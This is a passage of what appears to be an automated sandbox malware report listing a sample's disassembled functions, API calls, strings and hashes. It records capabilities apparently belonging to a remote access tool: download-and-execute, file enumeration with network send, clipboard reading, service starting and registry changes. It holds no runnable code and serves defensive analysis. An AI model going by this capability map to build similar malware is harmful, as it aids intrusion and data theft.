                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                      • String ID:
                                      • API String ID: 2435342581-0
                                      • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                      • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                      • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                      • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                      • String ID:
                                      • API String ID: 276877138-0
                                      • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                      • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                      • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                      • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                      • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                      • _wcschr.LIBVCRUNTIME ref: 00451E58
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                      • String ID: sJD
                                      • API String ID: 4212172061-3536923933
                                      • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                      • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                      • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                      • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                        • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                        • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                      • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                      • ExitProcess.KERNEL32 ref: 0040F8CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                      • String ID: 4.9.4 Pro$override$pth_unenc
                                      • API String ID: 2281282204-930821335
                                      • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                      • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                      • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                      • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                      • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                      • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                      • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID: SETTINGS
                                      • API String ID: 3473537107-594951305
                                      • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                      • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                      • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                      • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0040966A
                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstH_prologNext
                                      • String ID:
                                      • API String ID: 1157919129-0
                                      • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                      • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                      • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                      • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00408811
                                      • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                      • String ID:
                                      • API String ID: 1771804793-0
                                      • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                      • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                      • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                      • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DownloadExecuteFileShell
                                      • String ID: C:\Users\user\AppData\Roaming\NvbYSEq.exe$open
                                      • API String ID: 2825088817-3738706228
                                      • Opcode ID: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                                      • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                      • Opcode Fuzzy Hash: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                                      • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNextsend
                                      • String ID: XPG$XPG
                                      • API String ID: 4113138495-1962359302
                                      • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                      • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                      • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                      • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                        • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                        • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                        • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateInfoParametersSystemValue
                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                      • API String ID: 4127273184-3576401099
                                      • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                      • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                      • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                      • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: PkGNG
                                      • API String ID: 0-263838557
                                      • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                      • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                      • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                      • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                      • String ID:
                                      • API String ID: 2829624132-0
                                      • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                      • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                      • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                      • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                                      • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$AcquireRandomRelease
                                      • String ID:
                                      • API String ID: 1815803762-0
                                      • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                      • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                      • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                      • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(00000000), ref: 0040B711
                                      • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                      • CloseClipboard.USER32 ref: 0040B725
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$CloseDataOpen
                                      • String ID:
                                      • API String ID: 2058664381-0
                                      • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                      • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                      • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                      • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID: lJD
                                      • API String ID: 1084509184-3316369744
                                      • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                      • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                      • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                      • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID: lJD
                                      • API String ID: 1084509184-3316369744
                                      • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                      • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                      • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                      • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: GetLocaleInfoEx
                                      • API String ID: 2299586839-2904428671
                                      • Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                                      • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                      • Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                                      • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                      • String ID:
                                      • API String ID: 1663032902-0
                                      • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                      • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                      • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                      • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$InfoLocale_abort_free
                                      • String ID:
                                      • API String ID: 2692324296-0
                                      • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                      • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                      • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                      • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                      • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                      • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                      • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                      • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                      Memory Dump Source
